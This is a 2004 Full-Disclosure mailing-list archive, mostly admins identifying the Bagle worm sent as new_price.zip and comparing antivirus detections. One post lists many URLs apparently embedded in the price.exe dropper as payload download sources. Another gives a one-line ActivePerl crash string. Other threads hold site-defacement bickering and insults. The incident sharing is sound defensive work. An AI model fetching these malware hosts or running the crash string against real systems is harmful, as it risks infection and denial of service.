Todd, Thanks for the reply it appears to be a new beagle variant. http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_BAG LE.AC Jonathan Grotegut -Original Message- From: Todd Towles [mailto:[EMAIL PROTECTED] Sent: Monday, August 09, 2004 1:32 PM To: Jonathan Grotegut; 'Full-disclosure' Subject: RE: [Full-Disclosure] (no subject) I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
this Symantec Rapid Release beta will catch it for NAV users, until they roll-out the next official .def file: ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/beta/symcbetadefsx86.exe On Mon, 9 Aug 2004 14:32:14 -0500, Todd Towles [EMAIL PROTECTED] wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- -Micheal ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT today. From ClamAV Update list: Submission: 5025-web, 5026-web, 5027-web, 5028-web, 5029-web, 5030-web, 5043-web, 5044-web, 5045-web, 5046-web, 5047-web, 5048-web Sender: James Stevens, Bill Landry, Henning Spjelkavik, Melanie Dussiaume, Roman Scheucher, Gunter Mintzel, Mike Watterson, Martin, Rob Kudyba, wojciech myszka, Philip Corliss, Kevin Way Virus: unknown, JS/IllWill (McAfee), JS.Dword.dropper (Bitdefender), JScript/IE.VM.Exploit (Inoculate) Alias: TR/RunMe.Dldr.1 (Hbedv) Added: Trojan.JS.RunMe Added: Trojan.RunMe Note: The name may change. Note: There are more submissions with this; at the moment I'm publishing just some of them. -Mike Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many...
I doubt many are infected on the list. Spoofed addresses culled from eiither the list itself, or via google searches seems to apply here. I've seen at least 4-5 of these yuuckies purporting to come from me and this server here, but, note, it is a solaris server, and I'm doing e-mails here via pine, so those were spoofed. Thanks, Ron DuFresne On Mon, 9 Aug 2004, Todd Towles wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
I started seeing this earlier. No news from Norton that I can see. I'm trying to figure out what it does... Shannon Johnston On Mon, 2004-08-09 at 13:03, Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Shannon Johnston [EMAIL PROTECTED] Cavion Plus signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] (no subject)
List of URLs embedded within a price.exe i recieved. -M. http://polobeer.de/2.jpg http://r2626r.de/2.jpg http://kooltokyo.ru/2.jpg http://mmag.ru/2.jpg http://advm1.gm.fh-koeln.de/2.jpg http://evadia.ru/2.jpg http://megion.ru/2.jpg http://molinero-berlin.de/2.jpg http://dozenten.f1.fhtw-berlin.de/2.jpg http://shadkhan.ru/2.jpg http://sacred.ru/2.jpg http://kypexin.ru/2.jpg http://www.gantke-net.com/2.jpg http://www.mcschnaeppchen.com/2.jpg http://www.rollenspielzirkel.de/2.jpg http://134.102.228.45/2.jpg http://196.12.49.27/2.jpg http://aus-Zeit.com/2.jpg http://lottery.h11.ru/2.jpg http://herzog.cs.uni-magdeburg.de/2.jpg http://yaguark.h10.ru/2.jpg http://213.188.129.72/2.jpg http://thorpedo.us/2.jpg http://szm.sk/2.jpg http://lars-s.privat.t-online.de/2.jpg http://www.no-abi2003.de/2.jpg http://www.mdmedia.org/2.jpg http://abi-2004.org/2.jpg http://sovea.de/2.jpg http://www.porta.de/2.jpg http://matzlinger.com/2.jpg http://pocono.ru/2.jpg http://controltechniques.ru/2.jpg http://alexey.pioneers.com.ru/2.jpg http://momentum.ru/2.jpg http://omegat.ru/2.jpg http://www.perfectgirls.net/2.jpg http://porno-mania.net/2.jpg http://colleen.ai.net/2.jpg http://ourcj.com/2.jpg http://free.bestialityhost.com/2.jpg http://slavarik.ru/2.jpg http://burn2k.ipupdater.com/2.jpg http://carabi.ru/2.jpg http://spbbook.ru/2.jpg http://binn.ru/2.jpg http://sbuilder.ru/2.jpg http://protek.ru/2.jpg http://www.PlayGround.ru/2.jpg http://celine.artics.ru/2.jpg http://www.artics.ru/2.jpg http://www.laserbuild.ru/2.jpg http://www.lamatec.com/2.jpg http://www.sensi.com/2.jpg http://www.oldtownradio.com/2.jpg http://www.youbuynow.com/2.jpg http://64.62.172.118/2.jpg http://www.tayles.com/2.jpg http://dodgetheatre.com/2.jpg http://www.thepositivesideofsports.com/2.jpg http://www.bridesinrussia.com/2.jpg http://fairy.dataforce.net/2.jpg http://www.pakwerk.ru/2.jpg http://home.profootball.ru/2.jpg http://www.ankil.ru/2.jpg http://www.ddosers.net/2.jpg http://tarkosale.net/2.jpg http://www.boglen.com/2.jpg http://change.east.ru/2.jpg http://www.teatr-estrada.ru/2.jpg http://www.glass-master.ru/2.jpg http://www.zeiss.ru/2.jpg http://www.sposob.ru/2.jpg http://www.glavriba.ru/2.jpg http://alfinternational.ru/2.jpg http://euroviolence.com/2.jpg http://www.webronet.com/2.jpg http://www.virtmemb.com/2.jpg http://www.infognt.com/2.jpg http://www.vivamedia.ru/2.jpg http://www.zelnet.ru/2.jpg http://www.dsmedia.ru/2.jpg http://www.vendex.ru/2.jpg http://www.elit-line.ru/2.jpg http://pixel.co.il/2.jpg http://www.milm.ru/2.jpg http://dev.tikls.net/2.jpg http://www.met.pl/2.jpg http://www.strefa.pl/2.jpg http://kafka.punkt.pl/2.jpg http://www.rubikon.pl/2.jpg http://www.neostrada.pl/2.jpg http://werel1.web-gratis.net/2.jpg http://www.tuhart.net/2.jpg http://www.antykoncepcja.net/2.jpg http://www.dami.com.pl/2.jpg http://vip.pnet.pl/2.jpg http://www.webzdarma.cz/2.jpg http://emnesty.w.interia.pl/2.jpg http://niebo.net/2.jpg http://strony.wp.pl/2.jpg http://sec.polbox.pl/2.jpg http://www.phg.pl/2.jpg http://emnezz.e-mania.pl/2.jpg http://www.republika.pl/2.jpg http://www.silesianet.pl/2.jpg http://www.republika.pl/2.jpg http://tdi-router.opola.pl/2.jpg http://republika.pl/2.jpg http://infokom.pl/2.jpg http://silesianet.pl/2.jpg http://terramail.pl/2.jpg http://silesianet.pl/2.jpg http://www.iluminati.kicks-ass.net/2.jpg http://www.dilver.ru/2.jpg http://www.yarcity.ru/2.jpg http://www.scli.ru/2.jpg http://www.elemental.ru/2.jpg http://diablo.homelinux.com/2.jpg http://www.interrybflot.ru/2.jpg http://www.webpark.pl/2.jpg http://www.rafani.cz/2.jpg http://gutemine.wu-wien.ac.at/2.jpg http://przeglad-tygodnik.pl/2.jpg http://przeglad-tygodnik.pl/2.jpg http://pb195.slupsk.sdi.tpnet.pl/2.jpg http://www.ciachoo.pl/2.jpg http://cavalierland.5u.com/2.jpg http://www.nefkom.net/2.jpg http://rausis.latnet.lv/2.jpg http://www.hgr.de/2.jpg http://www.airnav.com/2.jpg http://www.astoria-stuttgart.de/2.jpg http://ultimate-best-hgh.0my.net/2.jpg http://wynnsjammer.proboards18.com/2.jpg http://www.jewishgen.org/2.jpg http://www.hack-gegen-rechts.com/2.jpg http://host.wallstreetcity.com/2.jpg http://quotes.barchart.com/2.jpg http://www.aannemers-nederland.nl/2.jpg http://www.sjgreatdeals.com/2.jpg http://financial.washingtonpost.com/2.jpg http://www.biratnagarmun.org.np/2.jpg http://hsr.zhp.org.pl/2.jpg http://traveldeals.sidestep.com/2.jpg http://www.hbz-nrw.de/2.jpg http://www.ifa-guide.co.uk/2.jpg http://www.inversorlatino.com/2.jpg http://www.zhp.gdynia.pl/2.jpg http://host.businessweek.com/2.jpg http://packages.debian.or.jp/2.jpg http://www.math.kobe-u.ac.jp/2.jpg http://www.k2kapital.com/2.jpg http://www.tanzen-in-sh.de/2.jpg http://www.wapf.com/2.jpg http://www.hgrstrailer.com/2.jpg http://www.forbes.com/2.jpg http://www.oshweb.com/2.jpg http://www.rumbgeo.ru/2.jpg http://www.dicto.ru/2.jpg http://www.busheron.ru/2.jpg http://www.omnicom.ru/2.jpg http://www.teleline.ru/2.jpg http://www.dynex.ru/2.jpg http://www.gamma.vyborg.ru/2.jpg
RE: [Full-Disclosure] (no subject)
It appears to be what TrendMico calls Beagle.AC - IDE released at 2:30pm Maybe it is dropping a older Trojan. -Original Message- From: Paul Szabo [mailto:[EMAIL PROTECTED] Sent: Monday, August 09, 2004 3:06 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] (no subject) Anyone have any idea what this is ... F-PROT ANTIVIRUS Program version: 4.4.2 Engine version: 3.14.11 VIRUS SIGNATURE FILES SIGN.DEF created 9 August 2004 SIGN2.DEF created 9 August 2004 MACRO.DEF created 10 May 2004 message-new__price.zip-price.html Infection: HTML/[EMAIL PROTECTED] message-new__price.zip-price/price.exe is a dropper for W32/Mitglieder.W Cheers, Paul Szabo - [EMAIL PROTECTED] http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Symantec identifies this as [EMAIL PROTECTED] -Bob Kehr Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Sent: Monday, August 09, 2004 3:25 PM To: Jonathan Grotegut Cc: Full-disclosure Subject: Re: [Full-Disclosure] (no subject) List of URLs embedded within a price.exe i recieved. -M. snip All of this is located on the SANS Internet Storm Center site. Bernard linked to it in his response. http://www.incidents.org ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many...
Well, that is what I meant. People that have people from FD are infected. Sorry typed that up fast when I was working on something else. -Original Message- From: Ron DuFresne [mailto:[EMAIL PROTECTED] Sent: Monday, August 09, 2004 3:40 PM To: Todd Towles Cc: 'Jonathan Grotegut'; 'Full-disclosure' Subject: RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many... I doubt many are infected on the list. Spoofed addresses culled from eiither the list itself, or via google searches seems to apply here. I've seen at least 4-5 of these yuuckies purporting to come from me and this server here, but, note, it is a solaris server, and I'm doing e-mails here via pine, so those were spoofed. Thanks, Ron DuFresne On Mon, 9 Aug 2004, Todd Towles wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
On Mon, 09 Aug 2004 16:07:02 -0400 Michael Erdely [EMAIL PROTECTED] wrote: ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT today. .. -Mike ClamAV has problems to filter the HTML-e-Mails. I received about 4 infected mails even clamscan/clamD know the virii. ClamScan identify the virii if I scan the atachement saved at the HDD without problems... vh pgpMgM6O7ZChW.pgp Description: PGP signature
Re: [Full-Disclosure] (no subject)
On Mon, 2004-08-09 at 14:43, Bernardo Quintero wrote: BitDefender 7.0/20040809 found [JS.Dword.dropper] ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe] eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit] F-Prot 3.15/20040809 found [HTML/[EMAIL PROTECTED] Kaspersky 4.0.2.23/20040809 found nothing McAfee 4383/20040804 found [JS/IllWill] NOD32v2 1.836/20040809 found [Win32/Bagle.AI] Norman 5.70.10/20040806 found [W32/Malware] Panda 7.02.00/20040809 found [Fichero Sospechoso] Sybari 7.5.1314/20040809 found [JS/IllWill] Symantec 8.0/20040809 found nothing TrendMicro 7.000/20040809 found [HTML_BAGLE.AC] Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particular medicine... Makes for a nice game of AV bingo though... -Frank signature.asc Description: This is a digitally signed message part
RE: [Full-Disclosure] (no subject)
F-Secure is saying that this is a new variant of bagel. http://www.f-secure.com/weblog/ Michael Poulin -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 3:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html DISCLAIMER: The information in this electronic mail message is sender's business Confidential and may be legally privileged. It is intended solely for the addressee(s). Access to this Internet electronic mail message by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it is prohibited and may be unlawful. The sender believes that this E-mail and any attachments were free of any virus, worm, Trojan horse, and/or malicious code when sent. This message and its attachments could have been infected during transmission. By reading the message and opening any attachments, the recipient accepts full responsibility for taking protective and remedial action about viruses and other defects. MASCO is not liable for any loss or damage arising in any way from this message or its attachments. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
Provid 25272 | 80.92.97.12 | SINSTELECOM-AS Autonomous Syst 25308 | 212.118.44.66| CITYLAN-AS CityLanCom, ISP, Mo 26085 | 66.163.161.45| YAOO Yahoo! 26201 | 208.185.127.160 | ABOUTC-1 About.com 26914 | 216.195.34.121 | GLOBA-10 Global Netoptex, Inc 29076 | 195.128.50.163 | HOSTER-RU-AS Hoster.RU autonom 29182 | 82.146.33.247| ISPSYSTEM-AS ISPsystem Autonom 29314 | 82.139.8.2 | DAMINET-AS Telewizja Kablowa D 29339 | 195.137.212.24 | MBBG-AS Markus Bach Betriebs G 30968 | 195.208.235.68 | INFOBOX-AS Net of Alkor Ltd, h johannes ullrich, jullrich ..at.. sans.org -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
It doesn't seem to me that Adam said or did anything in asking his question that should provoke such rude and condescending responses. It was after all a pretty simple question. I think unless you have something constructive to say you ought just ignore a post instead of acting like you've somehow been offended. Just my .02 Glenn On Mon, 26 Jul 2004 15:22:47 -0700 (PDT), Will Image [EMAIL PROTECTED] wrote: stop crying and learn how to patch your shit. why email a whole list over some bullshit, youre just making yourself look incompetent. --- VX Dude [EMAIL PROTECTED] wrote: If I may inquire, why would you care about such a nobody? Are you insulted that a real hacker didn't find your site worthy? It's just a website, why are you whining? The more you guys whine, the more they think what they do matters. -redX --- [EMAIL PROTECTED] wrote: Hello all, I just had a site cracked by some script-kiddy going by RedX. the little squirt was just being pesky by cracking the passwd for a simple store admin and plastering Hacked by redX in the php forms not a real hack. and he uploaded a file with some stupid logo he made with MS paint what a waist of time there was no real hack involved and no access to any important info. just wondering if anybody else has encountered this nobody? Adam - This mail sent through IMP: http://horde.org/imp/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? New and Improved Yahoo! Mail - Send 10MB messages! http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? Yahoo! Mail Address AutoComplete - You start. We finish. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
[EMAIL PROTECTED] wrote: Hello all, I just had a site cracked by some script-kiddy going by RedX. the little squirt was just being pesky by cracking the passwd for a simple store admin and plastering Hacked by redX in the php forms not a real hack. and he uploaded a file with some stupid logo he made with MS paint what a waist of time there was no real hack involved and no access to any important info. just wondering if anybody else has encountered this nobody? Adam - This mail sent through IMP: http://horde.org/imp/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Who gives a shit? Go search for him on Zone-H.org. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
stop crying and learn how to patch your shit. why email a whole list over some bullshit, youre just making yourself look incompetent. --- VX Dude [EMAIL PROTECTED] wrote: If I may inquire, why would you care about such a nobody? Are you insulted that a real hacker didn't find your site worthy? It's just a website, why are you whining? The more you guys whine, the more they think what they do matters. -redX --- [EMAIL PROTECTED] wrote: Hello all, I just had a site cracked by some script-kiddy going by RedX. the little squirt was just being pesky by cracking the passwd for a simple store admin and plastering Hacked by redX in the php forms not a real hack. and he uploaded a file with some stupid logo he made with MS paint what a waist of time there was no real hack involved and no access to any important info. just wondering if anybody else has encountered this nobody? Adam - This mail sent through IMP: http://horde.org/imp/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? New and Improved Yahoo! Mail - Send 10MB messages! http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? Yahoo! Mail Address AutoComplete - You start. We finish. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
Hello all, I just had a site cracked by some script-kiddy going by RedX. the little squirt was just being pesky by cracking the passwd for a simple store admin and plastering Hacked by redX in the php forms not a real hack. and he uploaded a file with some stupid logo he made with MS paint what a waist of time there was no real hack involved and no access to any important info. just wondering if anybody else has encountered this nobody? Adam - This mail sent through IMP: http://horde.org/imp/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
On Sun, 25 Jul 2004 [EMAIL PROTECTED] wrote: Hello all, I just had a site cracked by some script-kiddy going by RedX. the little squirt was just being pesky by cracking the passwd for a simple store admin and plastering Hacked by redX in the php forms not a real hack. and he uploaded a file with some stupid logo he made with MS paint what a waist of time there was no real hack involved and no access to any important info. just wondering if anybody else has encountered this nobody? Adam You'll likely have better luck on the incidents mailing list at securityfocus. -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF ...justice is a duty towards those whom you love and those whom you do not. And people's rights will not be harmed if the opponent speaks out about them. Osama Bin Laden - - - There aught to be limits to freedom!George Bush - - - Which one scares you more? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
If I may inquire, why would you care about such a nobody? Are you insulted that a real hacker didn't find your site worthy? It's just a website, why are you whining? The more you guys whine, the more they think what they do matters. -redX --- [EMAIL PROTECTED] wrote: Hello all, I just had a site cracked by some script-kiddy going by RedX. the little squirt was just being pesky by cracking the passwd for a simple store admin and plastering Hacked by redX in the php forms not a real hack. and he uploaded a file with some stupid logo he made with MS paint what a waist of time there was no real hack involved and no access to any important info. just wondering if anybody else has encountered this nobody? Adam - This mail sent through IMP: http://horde.org/imp/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? New and Improved Yahoo! Mail - Send 10MB messages! http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
If it was blatantly evident that the post was a hoax, why is mi2g crying like a six year old with a skinned knee? Nice imagery. I think you're being unfair. My 6yr old daughter hasn't whined like mi2g since she was a wee baby, skinned knee or no ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
- The very same people are finding these big bugs. It is not like there are a whole ton of unexperienced people finding these bugs. These are the best. They are experts at finding them. They may not always be cognizant of this themselves, the act of finding them may not seem difficult to them, but it is -- and this is clearly shown by the fact that the same people keep finding these bugs. I contend that the fact that the very same people are reporting bugs does not mean that they are the only ones finding them. Nor does it mean that only an expert might find them. Nor does it mean that all experts would be inclined to report them. Using any operating system that is 1) not obcessed with backward compatibility to the point that old vulnerabilities are retained forever, and 2) does not force users and servers alike to run unnecessary applications, and 3) is deployed by a company that manages its software development lifecycle in a manner that ensures all the various programmers are applying security patches to all the various versions under development, would be a big improvement. Microsoft might someday become such a companyXP SP2 being a start. And then you could look at how IE handles security zones... Whether the new search tool will be another built-in... Robin -- _ Web-based SMS services available at http://www.operamail.com. From your mailbox to local or overseas cell phones. Powered by Outblaze ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
Similarly - what's to keep someone from using their digital out form their home audio equipment to send the bits to their digital in on their computer? The problem is that many users of this list are so stupid, they would rather complain endlessly about copy protection rather than do exactly what you describe. The only possible conclusion one can draw is that the people who have written about how great a travesty copy-protection is are the only ones wholly unable to circumvent it. They are also the ones least likely to ever comment on security related topics, which is exactly what this list is for.
[Full-Disclosure] (no subject)
AMEN!!! Preach it, brother! Best regards, Bill Cerynik Managing Partner VC Consulting LLC 973.616.8170 [EMAIL PROTECTED] http://www.vcconsulting.biz Bringing open source solutions to the real world Message: 12 Date: Tue, 15 Jun 2004 14:52:11 -0400 From: Len Rose [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Administrivia: Classical Rant ATTENTION LAMERS Speaking for myself only, something has to be done about the quality of the information, and the standards of netiquette on this list. We all don't need to see mindlesS banter, and other noise spewing back and forth. If you can, please try to not post this spewage to the list, but instead send mail to each other (after carefully cutting and pasting on your windows desktop) If you must send it to the list it must be in terms of technical content, whether it is of a real security issue and not if Yahoo will increase your disk space or what slashdorks posted about something that was known since 2 months ago. I use the word technical loosely as in my mind, anything security related is inherently technical even if it/is not actually dealing with code or networks or systems. I'm very sick of seeing the amount of lame crap on this list, and I imagine a great deal of others are too. Thanks for listening. PS Unlike other reputable lists, we try not to censor anyone if they at least subscribe and never hit the queue. Lately we default to delete and try to approve those people who insist on posting without subscribing, or posting from a non-subscribed address. If reputable means bugtraq or cert then beat me with a stick. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
Oliver, Quickly testing the below string at the command line does crash perl.exe. I have ActivePerl 5.8.0 Build 805 install on a Windows 2000 machine. perl -e "$a="A" x 256; system($a)" -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Monday, May 17, 2004 4:24 PMTo: [EMAIL PROTECTED]Cc: [EMAIL PROTECTED]Subject: Buffer Overflow in ActivePerl ? hi folks, i played around with ActiveState's ActivePerl for Win32, and crashed Perl.exe with the following command: perl -e "$a="A" x 256; system($a)" I wonder if this bug isnt known?!? Because system() is a very common commandCan anybody reproduce this? I put together a little advisory on my website, including version information and a debugger output (Drwatson): http://www.oliverkarow.de/research/ActivePerlSystemBOF.txt PS: Due to travel activity, i will not be able to respond to mails within the next 8 days! Regards, Oliver
[Full-Disclosure] (no subject)
Last days I saw there was an advisory relating Sphiro by slotto. Well, we never released sphiro. It never was on our official website http://www.rosiello.org. It's definitely under development and not public yet, so the advisory is just a stupid way to offend us realized by slotto (I even don't know him). He made an advisory about a software not released to show how he's skill (he must be really cool...) This is a stupid joke by some stupid guy! best regards, Rosiello Security ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
Dinesh Kumar Windows Team |IT Infrastructure ( +91-0124-282 6301 * [EMAIL PROTECTED]
[Full-Disclosure] (no subject)
This e-mail is the property of Oxygen Media, LLC. It is intended only for the person or entity to which it is addressed and may contain information that is privileged, confidential, or otherwise protected from disclosure. Distribution or copying of this e-mail or the information contained herein by anyone other than the intended recipient is prohibited. If you have received this e-mail in error, please immediately notify us by sending an e-mail to [EMAIL PROTECTED] and destroy all electronic and paper copies of this e-mail.
[Full-Disclosure] (no subject)
unsuscribe ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
unsuscribe ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
mails without subject (was: [Full-Disclosure] (no subject))
Hallo Jim, * Jim Burnes [EMAIL PROTECTED] [2004-03-19 14:51]: Actually, what is really needed and primarily missing from the security picture is: a mail with a subject. regards nico -- Nico Golde| [EMAIL PROTECTED] | [EMAIL PROTECTED] | [EMAIL PROTECTED] http://www.ngolde.de | GnuPG Key: http://www.ngolde.de/gpg/nico_golde.gpg Fingerprint | FF46 E565 5CC1 E2E5 3F69 C739 1D87 E549 7364 7CFF echo [q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq|dc pgp0.pgp Description: PGP signature
[Full-Disclosure] (no subject)
